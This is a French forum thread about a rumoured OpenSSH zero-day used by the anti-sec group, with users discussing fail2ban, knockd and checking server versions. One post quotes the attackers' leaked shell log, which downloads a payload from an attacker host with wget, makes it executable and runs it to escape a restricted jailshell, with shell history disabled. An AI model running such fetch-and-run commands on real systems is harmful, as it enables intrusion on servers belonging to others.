Ce site est optimisé pour être consulté depuis un navigateur moderne dans lequel JavaScript est activé.

[Rumeur?] Faille 0-day remote-exploit dans OpenSSH?

®om

tux-planet a écritUn groupe de hackers, qui se nomme anti-sec, aurait réussi à pirater le serveur de l'un des administrateurs du site underground Astalavista.com. Ces derniers auraient exploité une faille de sécurité dans OpenSSH. Cette attaque fait beaucoup parler d'elle en ce moment, dans les réseaux underground et parmi les experts en sécurité, car celle-ci est de type Zero day.

http://www.tux-planet.fr/astalavista-pwnage-expose-by-anti-sec-group/

http://linuxfr.org/~Julien04/28520.html

Pour l'instant, ce n'est pas confirmé : réponse du mainteneur principal d'OpenSSH.

DrDam

pas mal .. chapeau les mec

®om

Si c'est vrai, j'ai bien aimé cette partie :

sh-3.1$ env
MANPATH=/usr/lib/courier-imap/man:
HOSTNAME=srv01.webhostline.com
SHELL=/usr/local/cpanel/bin/jailshell
TERM=xterm
HISTSIZE=1000
SSH_CLIENT=13.33.33.37 35154 2222
SSH_TTY=/dev/pts/1
USER=crownvip
MAIL=/var/spool/mail/infosec
PWD=/home/crownvip
INPUTRC=/etc/inputrc
JAVA_HOME=/usr/local/jdk
EDITOR=pico
LANG=en_US.UTF-8
HOME=/home/crownvip
SHLVL=4
LS_OPTIONS=--color=tty -F -a -b -T 0
LOGNAME=crownvip
CVS_RSH=ssh
VISUAL=pico
SSH_CONNECTION=13.33.33.37 35154 66.96.220.213 2222
CLASSPATH=.:/usr/local/jdk/lib/classes.zip
LESSOPEN=|/usr/bin/lesspipe.sh %s
HISTFILE=/dev/null
G_BROKEN_FILENAMES=1
_=/usr/bin/env


// Awww, jailshell... 

sh-3.1$ wget http://anti.sec.labs/MichaelScofield
--13:33:37--  http://anti.sec.labs/MichaelScofield
Resolving anti.sec.labs... 13.33.33.37
Connecting to anti.sec.labs|13.33.33.37|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4921 (4.8K) [text/plain]
Saving to: `MichaelScofield'

100%[=========================================================================================================================================>] 4,921       --.-K/s   in 0.08s

11:27:57 (64.0 KB/s) - `MichaelScofield' saved [4921/4921]

sh-3.1$ chmod +x MichaelScofield

sh-3.1$ ./MichaelScofield

	[+] MichaelScofield - Prison Breaker / anti-sec group
	[+] Grabbing environment variables...
	
	SHELL=/usr/local/cpanel/bin/jailshell
	
	[+] Injecting new shell..
	
	[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
	
	SHELL=/bin/sh

sh-3.1$ env
MANPATH=/usr/lib/courier-imap/man:
HOSTNAME=srv01.webhostline.com
SHELL=/bin/sh
TERM=xterm
HISTSIZE=1000
SSH_CLIENT=13.33.33.37 35154 2222
SSH_TTY=/dev/pts/1
USER=crownvip
MAIL=/var/spool/mail/infosec
PWD=/home/crownvip
INPUTRC=/etc/inputrc
JAVA_HOME=/usr/local/jdk
EDITOR=pico
LANG=en_US.UTF-8
HOME=/home/crownvip
SHLVL=4
LS_OPTIONS=--color=tty -F -a -b -T 0
LOGNAME=crownvip
CVS_RSH=ssh
VISUAL=pico
SSH_CONNECTION=13.33.33.37 35154 66.96.220.213 2222
CLASSPATH=.:/usr/local/jdk/lib/classes.zip
LESSOPEN=|/usr/bin/lesspipe.sh %s
HISTFILE=/dev/null
G_BROKEN_FILENAMES=1
_=/usr/bin/env


// Prison Break FTW.

DrDam

c'est là ou si je tente une comparaison ... eux ils savent peindre une toile de maitre ... moi ... je mordille le pinceau :lol::lol:

Bigcake

Rumeur ou pas, le sujet reste vraiment très intéressant.

Compte0

Une 0days sur openSSH... Si c'est vrai, y'a de quoi flipper un peu bcp. Alors si la version des log est bon et que la faille ne touche que cette version ( la 4.3 ), la Jaunty devrai être à peut prés tranquille ( openssh en version 1.5 ). Par sécurité je pense que je vais ajouter un knockd, en plus...

wido

Bonjour, maintenant imageshack en effacant des images d'un serveur et en le remplacant par leur message:

http://www.zataz.com/news/19231/anti-sec-movement--ssh-oday--imaheshack.html

®om

Pour des hackers, c'est assez étonnant d'être contre la "totale divulgation" (full-disclosure).

En fait ils veulent faire partie d'une "élite" et garder les exploits pour eux, et sont contre les "scripts kiddies"… Raisonnement assez étrange…

thurston

je comprends pas tout mais je trouve ca inquiétant.
Je me connecte en ssh chez mon père.
mes questions:
1. est ce que fail2ban est efficace dans ce cas là et aurait pu limiter la casse?
2. un truc que je trouve bizarre, si je fais ssh -v, j'ai plutot OpenSSH_5.1p1 que 1.5?? (jaunty), et je vois version 1.5 dans les posts?
3. knockd ca a l'air pas mal, ca vaut l'install?

A+
Thurston

Compte0

1. Fail2ban est utile pour lutter contre le brute force. Comme on ne sait rien de l'attaque, il est difficile de dire quelque chose... Au pifomètre, je dirai que, si c'est un 0days, alors ça devrai pas être en brute-forçant. Mais, franchement, je suis au delà de mes ( minimes ) compétences...
2. Le serveur openSSH de Ubuntu est surement patché, ça change pas grand chose.
3. Ben pas de port ouvert, pas d'attaque.

®om

thurston a écritsi je fais ssh -v, j'ai plutot OpenSSH_5.1p1 que 1.5?? (jaunty), et je vois version 1.5 dans les posts?

C'est bien 5.1 :

$ ssh -V
OpenSSH_5.1p1 Debian-5ubuntu1, OpenSSL 0.9.8g 19 Oct 2007

[supprimé]

C'est pas la version du client SSH, ça?

Ce qui compte pour une faille est la version du serveur:

telnet serveur 22
Trying 192.168.0.200...
Connected to serveur.
Escape character is '^]'.
SSH-2.0-OpenSSH_5.1p1 Debian-5

wido

http://www.google.fr/search?client=opera&rls=fr&q=antisec_at_hushmail.com&sourceid=opera&ie=utf-8&oe=utf-8
lol?